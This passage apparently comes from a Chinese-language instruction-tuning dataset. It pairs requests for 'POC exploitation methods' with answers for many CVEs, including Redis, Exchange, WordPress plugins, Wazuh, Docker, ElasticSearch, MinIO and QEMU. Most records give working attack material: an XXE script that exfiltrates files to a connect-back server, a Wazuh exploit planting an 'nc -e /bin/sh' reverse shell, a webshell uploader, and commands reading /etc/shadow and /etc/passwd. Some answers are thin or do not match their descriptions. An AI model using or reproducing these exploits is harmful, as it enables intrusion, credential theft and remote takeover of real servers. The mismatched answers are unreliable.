name=\"tp_user_reg_role\" type=\"text\">\n<input value=\"any\" name=\"nonce\" type=\"text\">\n<input type=\"submit\" />\n</form>\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175.md"}
    526. 

  526. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Redis Lua 沙箱绕过 远程命令执行 CVE-2022-0543\n漏洞描述:Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时,在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。\n影响版本:``` 只限于Debian和Debian派生的Linux发行版(如Ubuntu)上的Redis服务 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2022-0543\n【POC利用方法】\n1. 只限于Debian和Debian派生的Linux发行版(如Ubuntu)上的Redis服务\n2. eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"whoami\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\n3. 远程连接Redis, 执行POC\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Redis Lua 沙箱绕过 远程命令执行 CVE-2022-0543.md"}
    527. 

  527. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Microsoft Exchange 远程命令执行 CVE-2021-27065 26857 26858\n漏洞描述:Microsoft Exchange Server 是个消息与协作系统。Exchange Server可以被用来构架应用于企业、学校的邮件系统或免费邮件系统。2021年03月03日微软官方披露多个Exchange高危漏洞: ``` CVE-2021-26855 Exchange服务器端请求伪造漏洞。利用此漏洞的攻击者能够以Exchange Server发送HTTP请求,扫描内网,获取Exchange用户信息。 ``` ``` CVE-2021-26857 Exchange反序列化漏洞。该漏洞需要管理员权限,攻击者通过构造恶意请求,触发反序列化漏洞,在服务器上执行恶意代码。 ``` ``` CVE-2021-26858/CVE-2021-27065 Exchange中身份验证后的任意文件写入漏洞。攻击者可以通过CVE-2021-26855的ssrf漏洞获取到的Exchange administrator凭证,构造恶意请求,在系统上写入任意文件。 ```\n影响版本:``` Exchange 2013 Versions < 15.00.1497.012 Exchange 2016 CU18 < 15.01.2106.013 Exchange 2016 CU19 < 15.01.2176.009 Exchange 2019 CU7 < 15.02.0721.013 Exchange 2019 CU8 < 15.02.0792.010 ```\n网络测绘:``` icon_hash=\"1768726119\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-27065\n【POC利用方法】\n1. CVE-2021-26855\nExchange服务器端请求伪造漏洞。利用此漏洞的攻击者能够以Exchange Server发送HTTP请求,扫描内网,获取Exchange用户信息。\n2. CVE-2021-26857\nExchange反序列化漏洞。该漏洞需要管理员权限,攻击者通过构造恶意请求,触发反序列化漏洞,在服务器上执行恶意代码。\n3. CVE-2021-26858/CVE-2021-27065\nExchange中身份验证后的任意文件写入漏洞。攻击者可以通过CVE-2021-26855的ssrf漏洞获取到的Exchange administrator凭证,构造恶意请求,在系统上写入任意文件。\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Microsoft Exchange 远程命令执行 CVE-2021-27065 26857 26858.md"}
    528. 

  528. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Consul Docker images 空密码登录漏洞 CVE-2020-29564\n漏洞描述:Consul Docker images 0.7.1至1.4.2版本部署的Consul Docker容器的系统,可能允许远程攻击者使用空白密码来实现root用户访问。 参考链接: - https://github.com/koharin/CVE/blob/main/CVE-2020-29564\n影响版本:``` Consul Docker images 0.7.1-1.4.2 ```\n网络测绘:``` port=\"2375\" && protocol==\"docker\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2020-29564\n【POC利用方法】\n1. Consul Docker images 0.7.1-1.4.2\n2. port=\"2375\" && protocol==\"docker\"\n3. docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine\n\nFile Access: cat /mnt/etc/shadow\nRCE: chroot /mnt\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Consul Docker images 空密码登录漏洞 CVE-2020-29564.md"}
    529. 

  529. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Git-LFS 远程命令执行漏洞 CVE-2020-27955\n漏洞描述:Git LFS 是 Github 开发的一个 Git 的扩展,用于实现 Git 对大文件的支持 一些受影响的产品包括Git,GitHub CLI,GitHub Desktop,Visual Studio,GitKraden,SmartGit,Sourcetree等 该漏洞影响仅windows平台\n影响版本:``` Git-LFS(git-lfs)<= 2.12 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2020-27955\n【POC利用方法】\n1. Git-LFS(git-lfs)<= 2.12\n2. git clone https://github.com/r00t4dm/CVE-2020-27955\n3. https://github.com/r00t4dm/CVE-2020-27955\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Git-LFS 远程命令执行漏洞 CVE-2020-27955.md"}
    530. 

  530. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417\n漏洞描述:Franklin Electric Franklin Fueling Systems是美国Franklin Electric公司的一个加油系统。 Franklin Fueling Systems tsaupload.cgi 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感文件。\n影响版本:``` Franklin Fueling Systems ```\n网络测绘:``` \"Franklin Fueling Systems\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-46417\n【POC利用方法】\n1. Franklin Fueling Systems\n2. \"Franklin Fueling Systems\"\n3. /cgi-bin/tsaupload.cgi?file_name=../../../../../../etc/passwd&password=\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417.md"}
    531. 

  531. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Microsoft Exchange 信息泄露漏洞 CVE-2020-17143\n漏洞描述:此漏洞使远程攻击者可以披露有关受影响的Exchange Server安装的信息。利用身份验证才能利用此漏洞。 特定缺陷存在于GetWacIframeUrlForOneDrive服务命令的处理中。造成此问题的原因是缺乏对用户提供的xml的正确验证。攻击者可以利用此漏洞在SYSTEM上下文中披露信息。 Microsoft已发布更新来纠正此漏洞。可以在以下位置找到更多详细信息:https : //portal.msrc.microsoft.com/security-guidance/advisory/CVE-2020-17143 参考链接: - https://nvd.nist.gov/vuln/detail/CVE-2020-17143 - https://srcincite.io/advisories/src-2020-0030/\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2020-17143\n【POC利用方法】\n1. #!/usr/bin/env python3\nimport re\nimport sys\nimport urllib3\nimport requests\nfrom threading import Thread\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nclass xxe(BaseHTTPRequestHandler):\n    def log_message(self, format, *args):\n        return\n    def _set_response(self, d):\n        self.send_response(200)\n        self.send_header('Content-type', 'application/xml')\n        self.send_header('Content-Length', len(d))\n        self.end_headers()\n    def do_GET(self):\n        if \"leaked\" in self.path:\n            print(\"(+) stolen: %s\" % self.path)\n            message = \"<![CDATA[ <![ INCLUDE[]]> ]]>\"\n            self._set_response(message)\n            self.wfile.write(message.encode('utf-8'))\n            self.wfile.write('\\n'.encode('utf-8'))\n        elif \"poc.dtd\" in self.path:\n            print(\"(+) triggered xxe in exchange server!\")\n            message = \"\"\"\n<!ENTITY %% payload \"%%start;%%stuff;%%end;\">\n<!ENTITY %% param1 '<!ENTITY &#x25; external SYSTEM \"http://%s:%d/leaked?%%payload;\">'>\n%%param1; %%external;\"\"\" % (host, int(port))\n            self._set_response(message)\n            self.wfile.write(message.encode('utf-8'))\n            self.wfile.write('\\n'.encode('utf-8'))\n        elif \"poc.xml\" in self.path:\n            d = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE root [\n <!ENTITY %% start \"<![CDATA[\">\n <!ENTITY %% stuff SYSTEM \"file:///%s\">\n<!ENTITY %% end \"]]>\">\n<!ENTITY %% dtd SYSTEM \"http://%s:%d/poc.dtd\">\n%%dtd;\n]>\"\"\" % (file, host, int(port))\n            self._set_response(d)\n            self.wfile.write(d.encode('utf-8'))\n            self.wfile.write('\\n'.encode('utf-8'))\n        return\n\ndef main(t, usr, pwd, port):\n    server = HTTPServer(('0.0.0.0', port), xxe)\n    handlerthr = Thread(target=server.serve_forever, args=())\n    handlerthr.daemon = True\n    handlerthr.start()\n    s = requests.Session()\n    d = {\n        \"destination\" : \"https://%s/owa\" % t,\n        \"flags\" : \"\",\n        \"username\" : usr,\n        \"password\" : pwd\n    }\n    s.post(\"https://%s/owa/auth.owa\" % t, data=d, verify=False)\n    h = {\n        \"X-OWA-UrlPostData\" : '{\"request\":{\"DocumentUrl\":\"\",\"EndPointUrl\":\"http://%s:%d/poc.xml\"}}' % (host, port),\n        \"Action\" : \"GetWacIframeUrlForOneDrive\"\n    }\n    r = s.post(\"https://%s/owa/service.svc\" % t, headers=h, verify=False)\n    assert s.cookies.get(name='X-OWA-CANARY') != None, \"(-) couldn't leak the csrf canary!\" \n    h[\"X-OWA-CANARY\"] = s.cookies.get(name='X-OWA-CANARY')\n    s.post(\"https://%s/owa/service.svc\" % t, headers=h, verify=False)\n    \nif __name__ == '__main__':\n    if len(sys.argv) != 5:\n        print(\"(+) usage: %s <target> <user:pass> <connectback ip:port> <file>\" % sys.argv[0])\n        print(\"(+) eg: %s 192.168.75.142 harryh@exchangedemo.com:user123# 192.168.75.1:9090 \\\"C:/Users/harryh/secrets.txt\\\"\" % sys.argv[0])\n        sys.exit(-1)\n    trgt = sys.argv[1]\n    assert \":\" in sys.argv[2], \"(-) you need a user and password!\"\n    usr = sys.argv[2].split(\":\")[0]\n    pwd = sys.argv[2].split(\":\")[1]\n    host = sys.argv[3]\n    port = 9090\n    file = sys.argv[4]\n    if \":\" in sys.argv[3]: \n        host = sys.argv[3].split(\":\")[0]\n        port = sys.argv[3].split(\":\")[1]\n        assert port.isdigit(), \"(-) not a port number!\"\n    main(trgt, usr, pwd, int(port))\n2. \"X-OWA-UrlPostData\" : '{\"request\":{\"DocumentUrl\":\"\",\"EndPointUrl\":\"http://%s:%d/poc.xml\"}}' % (host, port),\n3. \"Action\" : \"GetWacIframeUrlForOneDrive\"\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Microsoft Exchange 信息泄露漏洞 CVE-2020-17143.md"}
    532. 

  532. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞\n漏洞描述:WordPress 3DPrint Lite Version 1.9.1.4 版本 中的 3dprint-lite-functions.php 文件存在文件上传漏洞,攻击者通过构造请求包可以上传任意文件获取服务器权限\n影响版本:``` 3DPrint Lite Version 1.9.1.4 版本 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【POC利用方法】\n1. 3DPrint Lite Version 1.9.1.4 版本\n2. if ( is_admin() ) {\n\tadd_action( 'admin_enqueue_scripts', 'p3dlite_enqueue_scripts_backend' );\n\tadd_action( 'wp_ajax_p3dlite_handle_upload', 'p3dlite_handle_upload' );\n\tadd_action( 'wp_ajax_nopriv_p3dlite_handle_upload', 'p3dlite_handle_upload' );\n\tinclude 'includes/3dprint-lite-admin.php';\n}\nelse {\n\tadd_action( 'wp_enqueue_scripts', 'p3dlite_enqueue_scripts_frontend' );\n\tinclude 'includes/3dprint-lite-frontend.php';\n}\n3. # Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload\n# Google Dork: inurl:/wp-content/plugins/3dprint-lite/\n# Date: 22/09/2021\n# Exploit Author: spacehen\n# Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/\n# Version: <= 1.9.1.4\n# Tested on: Ubuntu 20.04.1\n\nimport os.path\nfrom os import path\nimport json\nimport requests;\nimport sys\n\ndef print_banner():\n\tprint(\"3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload\")\n\tprint(\"Author -> spacehen (www.github.com/spacehen)\")\n\ndef print_usage():\n\tprint(\"Usage: python3 exploit.py [target url] [php file]\")\n\tprint(\"Ex: python3 exploit.py https://example.com ./shell.php\")\n\ndef vuln_check(uri):\n\tresponse = requests.get(uri)\n\traw = response.text\n\tif (\"jsonrpc\" in raw):\n\t\treturn True;\n\telse:\n\t\treturn False;\n\ndef main():\n\n\tprint_banner()\n\tif(len(sys.argv) != 3):\n\t\tprint_usage();\n\t\tsys.exit(1);\n\n\tbase = sys.argv[1]\n\tfile_path = sys.argv[2]\n\n\tajax_action = 'p3dlite_handle_upload'\n\tadmin = '/wp-admin/admin-ajax.php';\n\n\turi = base + admin + '?action=' + ajax_action ;\n\tcheck = vuln_check(uri);\n\n\tif(check == False):\n\t\tprint(\"(*) Target not vulnerable!\");\n\t\tsys.exit(1)\n\n\tif( path.isfile(file_path) == False):\n\t\tprint(\"(*) Invalid file!\")\n\t\tsys.exit(1)\n\n\tfiles = {'file' : open(file_path)}\n\tprint(\"Uploading Shell...\");\n\tresponse = requests.post(uri, files=files)\n\tfile_name = path.basename(file_path)\n\tif(file_name in response.text):\n\t\tprint(\"Shell Uploaded!\")\n\t\tif(base[-1] != '/'):\n\t\t\tbase += '/'\n\t\tprint(base + \"wp-content/uploads/p3d/\" + file_name);\n\telse:\n\t\tprint(\"Shell Upload Failed\")\n\t\tsys.exit(1)\n\nmain();\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞.md"}
    533. 

  533. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Wazuh Manager 代码执行漏洞CVE-2021-26814\n漏洞描述:Wazuh 从4.0.0到4.0.3的 Wazuh API允许经过身份验证的用户通过/manager/files URI以管理权限执行任意代码。\n影响版本:``` Wazuh Manager  v.4.0.0-4.0.3 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-26814\n【POC利用方法】\n1. Wazuh Manager  v.4.0.0-4.0.3\n2. PoC.py [-h] -user USERNAME -pwd PASSWORD -lip SRCIP -lport SRCPORT -tip\n              DESTIP -tport DESTPORT\n3. # Exploit Title: Wazuh 4.0.3 API RCE\n# Author: WickdDavid (Davide Meacci)\n# Date: 2021-01-01\n# Vendor Homepage: https://github.com/wazuh/wazuh\n# Version : 4.0.3\n\n\nimport requests\nimport sys\nimport argparse\nimport time\nimport json\nfrom urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\n\nparser = argparse.ArgumentParser(description='Wazuh-manager authenticated RCE by WickdDavid')\nparser.add_argument('-user', dest='username',required=True,\n                    help='wazuh API username')\nparser.add_argument('-pwd', dest='password',required=True,\n                    help='wazuh API password')\nparser.add_argument('-lip', dest='srcip',required=True,\n                    help='listening server')\nparser.add_argument('-lport', dest='srcport',required=True,\n                    help='listening port')\nparser.add_argument('-tip', dest='destip',required=True,\n                    help='target server ip (wazuh API)')\nparser.add_argument('-tport', dest='destport',required=True,\n                    help='target server port (wazuh API)')\n\n\nargs = parser.parse_args()\n\n# executed payload may be changed here\n\nexec_payload = \"\"\"\nimport os #:l\nos.system(\"nc %s %s -e /bin/sh\") #:l\n\"\"\" % (args.srcip, args.srcport)\n\n\nconfig_payload = { \"drop_privileges\": False }\n\n\nproxies = {\n\t\"http\":\"http://127.0.0.1:8080\",\n\t\"https\":\"https://127.0.0.1:8080\"\n}\n\ntarget = \"https://%s:%s\" % (args.destip,args.destport)\nauth_token = \"\"\npath_traversal = \"etc/lists/../../../../..\"\nheaders = {}\n\n# step 1 - obtaining auth token\n\nr = requests.get(\"%s/security/user/authenticate?raw=true\" % target, auth=(args.username, args.password),verify=False)\n\nif(r.status_code == 200):\n    auth_token = r.text\n    headers[\"Authorization\"] = \"Bearer %s\" % auth_token\nelse:\n    print(\"[!] No auth code recovered. Check username and password\")\n    exit(1)\n\n# step 2 - Privilege Escalation on API (not implemented)\n\n\n# step 3 - Save files to be restored later\n\nfile_to_overwrite = \"/var/ossec/api/scripts/wazuh-apid.py\"\nprint(\"[+] Saving files to restore later...\")\nr = requests.get(\"%s/manager/files?path=%s%s\" % (target,path_traversal,file_to_overwrite), headers = headers, verify=False)\nf = open(\"backup.py\",\"w\")\nf.write(json.loads(r.text)[\"contents\"])\nf.close()\ntime.sleep(1)\n\n# step 4 - Local Privilege Escalation \n\nprint(\"[+] Changing API config to run as root...\")\nr = requests.put(\"%s/manager/api/config\" % target, headers = headers, json = config_payload, verify=False)\ntime.sleep(1)\n\n# step 5 - Restart server (now api service runs as root) \n\nprint(\"[+] Restarting server...\")\nr = requests.put(\"%s/manager/restart?wait_for_complete=true\" % target, headers = headers,verify=False)\n#print(r.text)\n\ndata = {\"title\":\"Bad Request\"}\nwhile \"title\" in data and \"Bad request\" in data[\"title\"]:\n    time.sleep(5)\n    try:\n        r = requests.get(\"%s/manager/status\" % target, headers = headers, verify=False)\n        #print(r.text)\n        data = json.loads(r.text)\n    except:\n        continue\n\n# step 6 - Overwrite /var/ossec/api/scripts/wazuh-apid.py with malicious python payload\n\nprint(\"[+] Uploading payload...\")\nr = requests.put(\"%s/manager/files?path=%s%s&overwrite=true\" % (target,path_traversal,file_to_overwrite), headers = headers, data = exec_payload, verify=False)\n#print(r.text)\ntime.sleep(1)\n\n# step 7 - Restart server (now malicious payload will be run by the server)\n\n\nprint(\"[+] Restarting API service for the last time...\")\nr = requests.put(\"%s/manager/restart?wait_for_complete=true\" % target, headers = headers,verify=False)\n#print(r.text)\n\ndata = {\"title\":\"Bad Request\"}\nwhile \"title\" in data and \"Bad request\" in data[\"title\"]:\n    time.sleep(5)\n    try:\n        r = requests.get(\"%s/manager/status\" % target, headers = headers, verify=False)\n        #print(r.text)\n        data = json.loads(r.text)\n    except:\n        continue\n\n\nprint(\"[+] Payload executed, check your shell now.\")\nprint(\"[+] Remember to restore changed file (check local backup file)\")\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Wazuh Manager 代码执行漏洞 CVE-2021-26814.md"}
    534. 

  534. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Microsoft Exchange SSRF漏洞 CVE-2021-26885\n漏洞描述:Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证\n影响版本:``` Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 ```\n网络测绘:``` icon_hash=\"1768726119\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-26885\n【POC利用方法】\n1. Exchange 2013 Versions < 15.00.1497.012,\nExchange 2016 CU18 < 15.01.2106.013,\nExchange 2016 CU19 < 15.01.2176.009,\nExchange 2019 CU7 < 15.02.0721.013,\nExchange 2019 CU8 < 15.02.0792.010\n2. icon_hash=\"1768726119\"\n3. /owa/auth/Current/themes/resources/logon.css\n/owa/auth/Current/themes/resources/...\n/ecp/default.flt\n/ecp/main.css\n/ecp/<single char>.js\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Microsoft Exchange SSRF漏洞 CVE-2021-26885.md"}
    535. 

  535. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware vCenter Server 任意文件上传漏洞 CVE-2021-22005\n漏洞描述:VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。 2021年9月22日,VMware官方发布安全公告,披露了包括 CVE-2021-22005 VMware vCenter Server 任意文件上传漏洞在内的多个中高危严重漏洞。在CVE-2021-22005中,攻击者可构造恶意请求,通过vCenter中的Analytics服务,可上传恶意文件,从而造成远程代码执行漏洞。\n影响版本:``` VMware vCenter Server 7.0系列 < 7.0 U2c VMware vCenter Server 6.7系列 < 6.7 U3o VMware vCenter Server 6.5系列 不受漏洞影响 ``` 其余漏洞受影响版本可参考 :https://www.vmware.com/security/advisories/VMSA-2021-0020.html 安全版本: ``` VMware vCenter Server 7.0 U2c VMware vCenter Server 6.7 U3o ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-22005\n【POC利用方法】\n1. VMware vCenter Server 7.0系列 < 7.0 U2c \nVMware vCenter Server 6.7系列 < 6.7 U3o \nVMware vCenter Server 6.5系列 不受漏洞影响\n2. VMware vCenter Server 7.0 U2c \nVMware vCenter Server 6.7 U3o\n3. curl -k -v \"https://your-ip/analytics/telemetry/ph/api/level?_c=test\"\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/VMware vCenter Server 任意文件上传漏洞 CVE-2021-22005.md"}
    536. 

  536. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427\n漏洞描述:CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 参考文章: - http://cb.drops.wiki/drops/papers-5107.html - http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/ - https://github.com/XiphosResearch/exploits - http://cb.drops.wiki/drops/papers-5142.html **Groovy语言“沙盒”** ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本,但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法: 1. 既然对执行Java代码有沙盒,lupin的方法是想办法绕过沙盒,比如使用Java反射 2. Groovy原本也是一门语言,于是tang3另辟蹊径,使用Groovy语言支持的方法,来直接执行命令,无需使用Java语言 所以,根据这两种执行漏洞的思路,我们可以获得两个不同的POC。 Java沙盒绕过法: ``` java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText() ``` Goovy直接执行命令法: ``` def command='id';def res=command.execute().text;res ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2015-1427\n【POC利用方法】\n1. java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()\n2. def command='id';def res=command.execute().text;res\n3. POST /website/blog/ HTTP/1.1\nHost: 192.168.44.132:9200\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 25\n\n{\n  \"name\": \"test\"\n}\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427.md"}
    537. 

  537. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MinIO SSRF漏洞 CVE-2021-21287\n漏洞描述:随着工作和生活中的一些环境逐渐往云端迁移,对象存储的需求也逐渐多了起来,[MinIO](https://min.io/)就是一款支持部署在私有云的开源对象存储系统。MinIO完全兼容AWS S3的协议,也支持作为S3的网关,所以在全球被广泛使用,在Github上已有25k星星。MinIO中存在SSRF漏洞,通过漏洞可以获取敏感信息或远程命令执行\n影响版本:``` MinIO ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-21287\n【POC利用方法】\n1. // LoginSTS - STS user login handler.\nfunc (web *webAPIHandlers) LoginSTS(r *http.Request, args *LoginSTSArgs, reply *LoginRep) error {\n    ctx := newWebContext(r, args, \"WebLoginSTS\")\n\n    v := url.Values{}\n    v.Set(\"Action\", webIdentity)\n    v.Set(\"WebIdentityToken\", args.Token)\n    v.Set(\"Version\", stsAPIVersion)\n\n    scheme := \"http\"\n    // ...\n\n    u := &url.URL{\n        Scheme: scheme,\n        Host:   r.Host,\n    }\n\n    u.RawQuery = v.Encode()\n    req, err := http.NewRequest(http.MethodPost, u.String(), nil)\n    // ...\n}\n2. POST /minio/webrpc HTTP/1.1\nHost: 192.168.1.142:4444\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\nContent-Type: application/json\nContent-Length: 80\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n3. <?php\nheader('Location: http://192.168.1.142:4444/attack?arbitrary=params');\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/MinIO SSRF漏洞 CVE-2021-21287.md"}
    538. 

  538. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:QEMU 虚拟机逃逸漏洞 CVE-2020-14364\n漏洞描述:当地时间8月24日,一个存在于QEMU USB模拟器中的越界读写漏洞(CVE-2020-14364)被公布。 漏洞位于 ./hw/usb/core.c 中,当程序处理来自客户机的USB数据包时,如果在 do_token_in 与 do_token_out中’USBDevice->setup_len’超过了USBDevice->data_buf[4096],则存在问题。 客户机用户可能会使用此漏洞使QEMU进程崩溃,从而导致DoS或在宿主机上以QEMU进程的特权执行任意代码,实现虚拟机逃逸。 攻击者在拥有云环境虚拟机操作系统权限的情况下,便可利用该漏洞获取宿主机权限,进而攻击虚拟机所在资源池所有租户主机,甚至可通过已开通的内网权限攻击管理域系统,风险极高。 本次漏洞的影响范围较广,涉及qemu 1.0 以上的全部版本。\n影响版本:``` Qemu > 1.0 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2020-14364\n【POC利用方法】\n1. #include <assert.h>\n#include <fcntl.h>\n#include <inttypes.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/mman.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <sys/io.h>\n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <errno.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n#include <stdbool.h>\n#include <netinet/in.h> \n\nunsigned char* mmio_mem;\nchar *dmabuf;\nstruct ohci_hcca * hcca;\nstruct EHCIqtd * qtd;\nstruct ohci_ed * ed;\nstruct ohci_td * td;\nchar *setup_buf;\nuint32_t *dmabuf32;\nchar *td_addr;\nstruct EHCIqh * qh;\nstruct ohci_td * td_1;\nchar *dmabuf_phys_addr;\ntypedef struct USBDevice USBDevice;\ntypedef struct USBEndpoint USBEndpoint;\n\nstruct USBEndpoint {\n    uint8_t nr;\n    uint8_t pid;\n    uint8_t type;\n    uint8_t ifnum;\n    int max_packet_size;\n    int max_streams;\n    bool pipeline;\n    bool halted;\n    USBDevice *dev;\n    USBEndpoint *fd;\n    USBEndpoint *bk;\n};\n\nstruct USBDevice {\n    int32_t remote_wakeup;\n    int32_t setup_state;\n    int32_t setup_len;\n    int32_t setup_index;\n    USBEndpoint ep_ctl;\n    USBEndpoint ep_in[15];\n    USBEndpoint ep_out[15];\n};\n\n\ntypedef struct EHCIqh {\n    uint32_t next;                    /* Standard next link pointer */\n    /* endpoint characteristics */\n    uint32_t epchar;\n    /* endpoint capabilities */\n    uint32_t epcap;\n    uint32_t current_qtd;             /* Standard next link pointer */\n    uint32_t next_qtd;                /* Standard next link pointer */\n    uint32_t altnext_qtd;\n    uint32_t token;                   /* Same as QTD token */\n    uint32_t bufptr[5];               /* Standard buffer pointer */\n} EHCIqh;\n\ntypedef struct EHCIqtd {\n    uint32_t next;                    /* Standard next link pointer */\n    uint32_t altnext;                 /* Standard next link pointer */\n    uint32_t token;\n    uint32_t bufptr[5];               /* Standard buffer pointer */\n} EHCIqtd;\n\nuint64_t virt2phys(void* p)\n{\n    uint64_t virt = (uint64_t)p;\n    // Assert page alignment\n    int fd = open(\"/proc/self/pagemap\", O_RDONLY);\n    if (fd == -1)\n        die(\"open\");\n    uint64_t offset = (virt / 0x1000) * 8;\n    lseek(fd, offset, SEEK_SET);\n    uint64_t phys;\n    if (read(fd, &phys, 8 ) != 8)\n        die(\"read\");\n    // Assert page present\n\n    phys = (phys & ((1ULL << 54) - 1)) * 0x1000+(virt&0xfff);\n    return phys;\n}\n\n \n\nvoid die(const char* msg)\n{\n    perror(msg);\n    exit(-1);\n}\n\n \nvoid mmio_write(uint32_t addr, uint32_t value)\n{\n    *((uint32_t*)(mmio_mem + addr)) = value;\n}\n\n \n\nuint64_t mmio_read(uint32_t addr)\n{\n    return *((uint64_t*)(mmio_mem + 